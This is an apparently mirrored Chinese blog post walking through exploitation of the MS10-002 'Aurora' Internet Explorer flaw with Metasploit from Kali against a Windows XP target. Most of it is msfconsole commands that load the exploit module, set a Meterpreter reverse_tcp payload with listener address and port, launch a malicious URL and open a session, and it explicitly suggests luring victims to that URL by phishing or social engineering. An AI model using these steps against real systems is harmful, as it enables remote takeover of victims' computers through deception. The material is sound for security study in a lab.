zoukankan      html  css  js  c++  java
  • ms10_002 IE浏览器漏洞

    一、环境说明

    kali linux

    靶机:xp

    二、ms10_002漏洞利用

    msf5 exploit(windows/smb/ms08_067_netapi) > search ms10_002_aurora
    msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/browser/ms10_002_aurora 

    msf5 exploit(windows/browser/ms10_002_aurora) > show options

     设置srchost(自己kali的地址,让目标主机连接)

    msf5 exploit(windows/browser/ms10_002_aurora) > set srchost 192.168.244.128
    srchost => 192.168.244.128
    msf5 exploit(windows/browser/ms10_002_aurora) > set sevport 8080
    sevport => 8080

    设置meterpreter

    msf5 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

    设置监听地址(kali主机IP)

    msf5 exploit(windows/browser/ms10_002_aurora) > set lhost 192.168.244.128
    lhost => 192.168.244.128
    msf5 exploit(windows/browser/ms10_002_aurora) > set lport 1123
    lport => 1123
    msf5 exploit(windows/browser/ms10_002_aurora) > show options

     设置target(无需设置)

     启动

    msf5 exploit(windows/browser/ms10_002_aurora) > run

    如下图所示:生成连接http://192.168.244.128:8080/EMoyg47   让其他人访问(钓鱼、社工等等方式 让别人访问)

     

     找个windows IE浏览器访问(这里xp)

     到kali查看是否建立会话(如下图所示,成功连接会话)

     测试,连接会话

    msf5 exploit(windows/browser/ms10_002_aurora) > sessions -i 3

  • 相关阅读:
    屠呦呦团队研究新进展:青蒿中有其他抗疟成分
    lammps模拟化学反应(1)
    伪类的使用--鼠标悬浮效果
    bootstrap中模态框的使用
    idea_2018.1.5版本的激活使用
    火狐浏览器开发者版本
    使用bootstrap的相关配置
    StringBuffer类
    如何判断字符串中大写字母,小写字母和数字出现的次数??
    ssm框架结构的搭建
  • 原文地址:https://www.cnblogs.com/hwlong/p/8597765.html
Copyright © 2011-2022 走看看